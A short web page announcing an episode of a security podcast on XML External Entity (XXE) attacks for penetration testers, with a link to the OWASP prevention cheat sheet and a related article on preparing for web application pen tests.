Tradecraft Security WeeklySubscribe
Penetration Testing

Dissecting XXE Attacks – Tradecraft Security Weekly #19

When pentesting web services or an application that leverage XML files, XML External Entity (XXE) attacks are a great way to start. By injecting an XXE into a well crafted XML payload before it's sent to the server, a penetration tester can trick the parser into executing other actions that the developer never intended. This can lead to reading local files, server-side request forgeries (SSRF) or even gaining remote code execution (RCE). To help penetration testers, Beau Bullock (@dafthack) and Mike Felch (@ustayready) cover a few different methods to attack XML parsers in episode 19 of Tradecraft Security Weekly! Links: https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet

[audio src=" http://traffic.libsyn.com/tswaudio/Dissecting_XXE_Attacks_-_Tradecraft_Security_Weekly_19_converted.mp3"]

Related

How to prepare for an effective web application penetration test 

At a time when data breaches and cyberattacks dominate headlines, web application security is top on the minds of IT leaders. By performing regular web application pen tests, possible vulnerabilities can be uncovered and steps taken to fortify your defenses. In this post, we'll discuss the importance of preparing for a pen test, the items that should be on your pen test checklist, and how to foster close collaboration with your pen testing team. 

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms of Use and Privacy Policy.

Related Terms

BugBuffer OverflowDisassemblyPenetration and Penetration Testing

You can skip this ad in 5 seconds